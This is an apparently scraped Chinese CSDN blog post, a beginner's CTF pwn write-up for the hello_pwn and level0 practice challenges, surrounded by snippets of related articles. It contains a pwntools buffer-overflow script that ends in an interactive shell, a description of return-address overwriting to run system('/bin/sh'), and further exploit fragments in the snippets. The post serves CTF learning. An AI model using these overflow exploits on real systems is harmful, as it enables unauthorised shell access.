PWN我要入门！！！

最新推荐文章于 2022-01-09 21:57:26 发布

王俊凯迷妹

最新推荐文章于 2022-01-09 21:57:26 发布

阅读量199

点赞数

分类专栏： PWN

本文链接：https://blog.csdn.net/sinat_31884905/article/details/116997693

版权

PWN 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

一.攻防世界新手区

hello_pwn

覆盖掉数据

常规操作的两步
. 在这里插入图片描述

本地打通

远程打通content=0 此时运行脚本

练习本地打穿

from pwn import *

context(os='linux',arch="amd64",log_level="debug")
content=1

def main():
    if content == 1:
        wjk=process('./hello_pwn')
    else:
        wjk = remote("172.16.83.24")

    payload=b'a'*(0x6c-0x68)
    payload=payload + p64(1853186401)

    wjk.recvuntil("lets get helloworld for bof\n")
    wjk.sendline(payload)  发送一行数据，相当于在末尾加\n


    wjk.interactive() 与shell交互

main()

在这里插入图片描述
2.level0

用buf进行覆盖，覆盖到return函数处，return会跳到对应新的函数处，这里覆盖成我们想让它跳转到的函数地址

要跳转的函数地址

在这里插入图片描述

执行system('/bin/sh')从而拿到shell

在这里插入图片描述
3.level3

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

王俊凯迷妹

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

1.pwn基础总结

admin的博客

10-03

1万+

Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.

pwntools使用简介

热门推荐

jmp esp

05-07

4万+

0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库，用Python开发，由rapid设计，旨在让使用者简单快速的编写exploit。pwntools下载：https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex

参与评论您还未登录，请先登录后发表或查看评论

mips&arm&aarch64-pwn初探

seaaseesa的博客

04-02

4880

mips&arm&aarch64-pwn初探前言厌倦了x86/x64 平台下的二进制漏洞利用，来看看mips/arm平台下的pwn是如何达到利用的。众所周知，mips/arm架构cpu主要用于嵌入式设备，比如路由器这些。当我们在x86/x64平台练习到一定境界后，再去探索一个新的平台下的漏洞利用，我们可以借鉴以前的方法，总之，思想都是一样的。只不过是指令的样子不同而已。 ...

pwn 堆入门之tcache

清霂的博客

05-13

540

目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l

关于PwnTools的各种汇总

分不清东西南北的Laffey

09-26

2846

大致框架官网的一个简单样例 from pwn import * #用来导入pwntools模块 context(arch = 'i386', os = 'linux') #用来设置目标机的信息 r = remote('exploitme.example.com', 31337) #建立一个远程连接 url或者ip作为地址指明端口 r.send(asm(shellcraft.sh())) ...

CTF-PWN笔记（一）-- 栈溢出之基础ROP

CK_0ff的博客

01-09

4696

文章目录栈linux内存布局原理文件保护机制CanaryNXPIE（ASLR）RELRO简单的栈溢出(ret2txt)ret2shellcode 栈栈是一种典型的后进先出 (Last in First Out) 的数据结构，其操作主要有压栈 (push) 与出栈 (pop) 两种操作，如下图所示（维基百科）。两种操作都操作栈顶，当然，它也有栈底。高级语言在运行时都会被转换为汇编程序，在汇编程序运行过程中，充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间，其中某一部分就是该程序对应的栈，用于保存

一道pwn入门的练习题

10-23

直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例

02-11

02-11

08-03

1. 各大主流平台汇编语言，例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一

PWN

qq_42352315的博客

12-29

950

pwn的一些题目写给自己看的 1、BUUCTF上面ciscn_2019_c_1这道题，没什么好说的，标准retlibc题目，泄露函数的got表值从而获取libc_base，网上相关方法一堆，直接贴代码 from pwn import * # context(log_level='debug',arch='amd64') p=remote('node3.buuoj.cn',25231) #encrypt方法是为了绕过题目的encrypt加密 def encrypt(s): str1=list(s)

PWN入门

weixin_30257433的博客

03-24

1051

pwn ”Pwn”是一个黑客语法的俚语词，是指攻破设备或者系统。发音类似“砰”，对黑客而言，这就是成功实施黑客攻击的声音——砰的一声，被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介，而我个人理解的话，应该就是向目标发送特定的数据，使得其执行本来不会执行的代码，前段时间爆发的永恒之蓝等病毒其实也算得上是pwn的一种。 pwn介绍 CTF pwn中的目标是拿到fl...

pwn远程打通本地打不通的“玄学“问题解释

fa1c4的blog

09-30

2480

前言速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事问题查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地解决参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib

pwn入门教程——环境配置

mizhuirongq9376的博客

05-03

616

开始用于docker 在kali里面搭建环境以上是搭建环境的教程，教程虽然短，但是我也花了好长时间，因为中间不会那么顺利。现在把中间遇到的一些问题罗列以下 1.kali安装 docker https://blog.csdn.net/u010953692/article/details/91855640?utm_medium=distribute.pc_relevant.none-task-b...

长春人文学院在河北2021-2024各专业最低录取分数及位次表.pdf

09-16

全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

CPA《公司战略与风险管理》张英奎基础班第1章战略管理中的权力与利益相关者2.pdf

09-16

CPA《公司战略与风险管理》张英奎基础班第1章战略管理中的权力与利益相关者2.pdf

昆明文理学院在河北2021-2024各专业最低录取分数及位次表.pdf

09-16

全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

C++开发模板文档.docx